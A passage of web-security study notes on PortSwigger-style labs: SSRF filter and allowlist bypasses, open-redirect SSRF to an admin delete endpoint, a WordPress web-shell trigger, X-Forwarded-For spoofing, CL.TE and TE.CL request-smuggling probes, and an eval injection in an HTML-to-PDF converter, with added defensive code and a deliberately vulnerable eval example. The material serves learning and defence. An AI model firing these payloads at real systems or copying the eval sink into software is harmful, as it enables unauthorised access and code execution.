spoofed.burpcollaborator.net
```

Changing the case (e.g. `LoCalHost`) also works against a case-sensitive blocklist.
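Every spelling in the list above names the loopback address, and a blocklist that compares strings catches none of them. The following is an added example (not from these notes and not any real application's filter) that puts that weak check next to one that resolves the host and classifies the resulting address. The hostnames `localtest.me`, `127.0.0.1.nip.io` and `stock.weliketoshop.net` are resolved from a constructed stub table so the code runs offline; a real check would call `socket.getaddrinfo()` and then connect to the address it validated rather than re-resolving.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed stub DNS so the example runs offline. A real check resolves with
# socket.getaddrinfo() at request time and then connects to the validated
# address itself, so DNS rebinding cannot swap the answer between check and use.
FAKE_DNS = {
    "localtest.me": "127.0.0.1",
    "127.0.0.1.nip.io": "127.0.0.1",
    "stock.weliketoshop.net": "93.184.216.34",   # arbitrary public address for the demo
}


def naive_blocklist_allows(url: str) -> bool:
    """The weak check: refuses only the literal strings an attacker expects."""
    host = urlsplit(url).hostname or ""
    return host not in ("127.0.0.1", "localhost")


def parse_legacy_ipv4(host: str):
    """Accept the non-dotted-quad forms that inet_aton() understands: a bare
    integer (2130706433), octal (017700000001) and short forms (127.1).
    Returns an IPv4Address, or None if the host is not such a literal."""
    try:
        packed = socket.inet_aton(host)     # the classic BSD parser accepts all of these
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def resolve(host: str, dns=FAKE_DNS):
    """Map a host string to an IP address object, or None if it does not resolve."""
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # ordinary IPv4/IPv6 literal, e.g. ::1
        except ValueError:
            ip = ipaddress.ip_address(dns[host]) if host in dns else None
    return ip


def hardened_allows(url: str, dns=FAKE_DNS) -> bool:
    """The stronger check: restrict the scheme, resolve the host, and allow only
    globally routable unicast addresses. Loopback, RFC 1918, link-local (cloud
    metadata at 169.254.169.254) and ::1 all fail is_global."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    ip = resolve(parts.hostname or "", dns)
    return ip is not None and ip.is_global and not ip.is_multicast


if __name__ == "__main__":
    for candidate in ("http://2130706433/", "http://017700000001/", "http://127.1/",
                      "http://localtest.me/", "http://[::1]/", "http://stock.weliketoshop.net/"):
        print(f"{candidate:35} blocklist={naive_blocklist_allows(candidate)!s:5} "
              f"hardened={hardened_allows(candidate)}")
```

The decisive design choice is to classify the resolved address instead of the string: `is_global` already rejects loopback, private, link-local and the documentation ranges, so none of the encodings on the list need their own rule.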
IP to integer (bypass blocklists): https://www.browserling.com/tools/ip-to-dec

### Bypass filter via open redirect

- open redirect page
- API (the web application launches the request itself)

![圖片](https://hackmd.io/_uploads/rJAaoeP70.png)

```
POST /stock (SSRF)
api=/Open/Redirect/Page?path=http://127.0.0.1:8080
/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos   (works!)
```

### Bypass allowlist

Note: the `#` is double-encoded so the first decoding step does not treat it as a fragment and drop everything after it:

```
http://127.0.0.1#meow:meow@stock.weliketoshop.net
http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net
```

Works.

# CMS panel to RCE

## Typo3 admin panel to RCE

![image](https://hackmd.io/_uploads/ByqePz-kC.png)

![image](https://hackmd.io/_uploads/ByCbwG-JA.png)

![image](https://hackmd.io/_uploads/BJ2fwfbJA.png)

![image](https://hackmd.io/_uploads/SyIzPGbkC.png)

![image](https://hackmd.io/_uploads/Sy3mwzZ1A.png)

![image](https://hackmd.io/_uploads/rJaEvf-y0.png)

## WordPress panel RCE

Trigger the web shell written into a theme file:

```
http://$TARGET_IP/wp-content/themes/twentytwelve/404.php
```

## HTTP Header

### IP-protection bypass (if the website sits behind a proxy)

X-Forwarded-For

```
curl -H "X-Forwarded-For: 10.10.10.1" 127.0.0.1:3000
```

# HTTP Request Smuggling

Exploit -> HTTP/1.1 (works)

- Settings:

```
Content-Length:
Transfer-Encoding: chunked
```

To stop the POST being rejected as invalid, also set:

```
Content-Type: application/x-www-form-urlencoded
```

## CL.TE

Vulnerability identification (works):

```
POST / HTTP/1.1
Host: 0a3300c1033290bc81a2c6af00dd00df.web-security-academy.net
Content-Length: 15
Transfer-Encoding: chunked

0

meowhecker
```

Send it twice. The front-end forwards the whole 15-byte body, the back-end stops at the `0` chunk and keeps `meowhecker` in its buffer, so the second request arrives as `meowheckerPOST / HTTP/1.1 ...`. If the site answers with an error such as unrecognised method `MEOWHECKERPOST`, the vulnerability is confirmed.
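What "the back-end keeps `meowhecker` in its buffer" means is easiest to see by framing the same bytes both ways. The following is an added example, not part of the original notes: a model of a front-end and a back-end that each frame one request by either `Content-Length` or `Transfer-Encoding: chunked`, and a `desync()` helper that returns the leftover bytes the back-end will glue onto the next request on that connection. It reproduces the CL.TE probe above and, going beyond it, the TE.CL direction and the timing variants, where the back-end never sees the end of the body and blocks. All requests are constructed inline; nothing is sent on the network.

```python
def frame_by_content_length(data: bytes):
    """Number of bytes making up one request when the body length comes from
    Content-Length (0 if absent). None if the body has not fully arrived."""
    head_end = data.find(b"\r\n\r\n")
    if head_end == -1:
        return None
    length = 0
    for line in data[:head_end].split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    end = head_end + 4 + length
    return end if end <= len(data) else None


def frame_by_chunked(data: bytes):
    """Number of bytes making up one request when the body is read as hex-sized
    chunks up to the zero chunk. None if that terminator has not arrived, which
    is exactly what a timing probe exploits: the server keeps waiting."""
    head_end = data.find(b"\r\n\r\n")
    if head_end == -1:
        return None
    pos = head_end + 4
    while True:
        nl = data.find(b"\r\n", pos)
        if nl == -1:
            return None
        size = int(data[pos:nl].split(b";")[0], 16)   # chunk extensions ignored
        pos = nl + 2
        if size == 0:
            return pos + 2 if data[pos:pos + 2] == b"\r\n" else None
        pos += size + 2                                # chunk data plus its CRLF
        if pos > len(data):
            return None


FRAMERS = {"cl": frame_by_content_length, "te": frame_by_chunked}


def desync(data: bytes, front: str, back: str):
    """The front-end frames `data` by `front` ('cl' or 'te') and forwards exactly
    those bytes; the back-end frames them by `back`. Returns the bytes the
    back-end leaves in its buffer (they become the start of the NEXT request on
    that connection), b"" when both agree, or None when the back-end blocks."""
    n_front = FRAMERS[front](data)
    if n_front is None:
        return None
    forwarded = data[:n_front]
    n_back = FRAMERS[back](forwarded)
    return None if n_back is None else forwarded[n_back:]


# The CL.TE probe from the notes: 15 == len(b"0\r\n\r\nmeowhecker").
CL_TE_PROBE = (b"POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 15\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nmeowhecker")

# CL.TE timing probe: only b"1\r\nF" is forwarded, so a chunked back-end waits.
CL_TE_TIMING_PROBE = (b"POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\n"
                      b"Transfer-Encoding: chunked\r\n\r\n1\r\nF\r\nTEnotZeroToEnd")

# TE.CL probe (constructed): the smuggled request rides inside one chunk whose
# size line is computed, so the hex length is always right.
SMUGGLED = b"GPOST / HTTP/1.1\r\nContent-Length: 3\r\n\r\nx=1"
TE_CL_PROBE = (b"POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n"
               + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n")

# TE.CL timing probe: the chunked front-end forwards 5 bytes, the back-end
# expects 7 and waits for the rest.
TE_CL_TIMING_PROBE = (b"POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 7\r\n"
                      b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n10")


if __name__ == "__main__":
    print("CL.TE leftover:", desync(CL_TE_PROBE, "cl", "te"))            # b'meowhecker'
    print("CL.TE timing  :", desync(CL_TE_TIMING_PROBE, "cl", "te"))     # None -> back-end hangs
    print("TE.CL leftover:", desync(TE_CL_PROBE, "te", "cl")[:16])       # b'GPOST / HTTP/1.1'
    print("TE.CL timing  :", desync(TE_CL_TIMING_PROBE, "te", "cl"))     # None -> back-end hangs
    print("agree         :", desync(CL_TE_PROBE, "cl", "cl"))            # b''
```

Whatever `desync()` returns is prepended to the next request the back-end reads, which is why the CL.TE probe surfaces as an unknown method `MEOWHECKERPOST` and the TE.CL one as a `GPOST` request; `None` corresponds to the timeout the time-based probes look for.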
Time-based detection (works):

```
POST / HTTP/1.1
Host: 0a35008c04210c4984e9b02d00310030.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 4

1
F
TEnotZeroToEnd
```

The front-end forwards only the 4 bytes `1\r\nF`; the back-end reads the 1-byte chunk and then waits for the next chunk size, which never arrives -> timeout.

## TE.CL

Vulnerability identification (works):

```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 2

4c
POST /meowheckerAdminPennel HTTP/1.1
Content-Length: 200

meow=meowhecker
0

```

![圖片](https://hackmd.io/_uploads/BySfbr8MR.png)

Time-based detection (works):

```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 7

0

10
```

The chunked front-end stops at the `0` chunk and forwards 5 bytes; the back-end expects 7 and waits for the rest -> timeout.

---

![圖片](https://hackmd.io/_uploads/B154fkwfC.png)

# HTML to PDF RCE: ReportLab eval() (code injection)

Injection point: an HTML colour attribute value. The converter passes the attribute value to an eval-style function.

Defence functions:

![image](https://hackmd.io/_uploads/HyvZXQEEC.png)

# PHP Hash

https://www.cnblogs.com/haidragon/p/16845563.html
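The "HTML to PDF" note above describes an attribute value reaching `eval()`. The following is an added example, not ReportLab's code and not an exploit for it: a toy `<font color="...">` parser written the vulnerable way next to a hardened one, run over constructed HTML fragments. `EXECUTED` is a marker list whose growth proves the attribute was executed rather than parsed, and the emptied `__builtins__` on the `eval()` call is there to show that such a restriction does not make the pattern safe.

```python
import re

NAMED_COLOURS = {"red": (255, 0, 0), "green": (0, 128, 0), "blue": (0, 0, 255)}
HEX_COLOUR = re.compile(r"^#([0-9a-fA-F]{6})$")
FONT_COLOR_ATTR = re.compile(r'<font\s+color="([^"]*)"', re.IGNORECASE)

# Marker: an injected expression can append to this list, which proves the
# attribute value ran as code. Constructed for the demo.
EXECUTED = []


def _hex_to_rgb(value: str):
    """Parse #RRGGBB into an (r, g, b) tuple, or return None."""
    m = HEX_COLOUR.match(value)
    if not m:
        return None
    h = m.group(1)
    return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))


def to_colour_unsafe(value: str):
    """Vulnerable pattern: names and #RRGGBB are handled, then anything else is
    evaluated so that (255, 0, 0) or 0xff0000 "just work". Emptying __builtins__
    is not a sandbox: attribute access and method calls still run."""
    value = value.strip()
    if value.lower() in NAMED_COLOURS:
        return NAMED_COLOURS[value.lower()]
    rgb = _hex_to_rgb(value)
    if rgb is not None:
        return rgb
    return eval(value, {"__builtins__": {}}, {"EXECUTED": EXECUTED})   # the sink


def to_colour_safe(value: str):
    """Hardened parser: allow-list of names plus a strict #RRGGBB pattern.
    Everything else is rejected and nothing is ever evaluated."""
    value = value.strip()
    if value.lower() in NAMED_COLOURS:
        return NAMED_COLOURS[value.lower()]
    rgb = _hex_to_rgb(value)
    if rgb is None:
        raise ValueError(f"rejected colour value: {value!r}")
    return rgb


def render_colours(html: str, parser):
    """Pull every <font color="..."> value out of a fragment and run it through
    `parser`, the way a converter would while laying out the text."""
    return [parser(v) for v in FONT_COLOR_ATTR.findall(html)]


# Constructed input: a benign fragment and one whose colour is an expression.
BENIGN_HTML = '<p><font color="red">a</font> <font color="#00FF00">b</font></p>'
INJECTED_VALUE = "EXECUTED.append('code ran') or (0, 0, 0)"
INJECTED_HTML = f'<p><font color="{INJECTED_VALUE}">pwn</font></p>'


if __name__ == "__main__":
    print(render_colours(BENIGN_HTML, to_colour_safe))      # [(255, 0, 0), (0, 255, 0)]
    print(render_colours(INJECTED_HTML, to_colour_unsafe))  # [(0, 0, 0)], and EXECUTED grows
    print(EXECUTED)                                          # ['code ran']
    try:
        render_colours(INJECTED_HTML, to_colour_safe)
    except ValueError as err:
        print("safe parser:", err)
```

The hardened version never needs a denylist of dangerous names because it does not interpret the value at all; the unsafe version still returns a plausible colour for the injected attribute, which is why this class of bug survives functional testing.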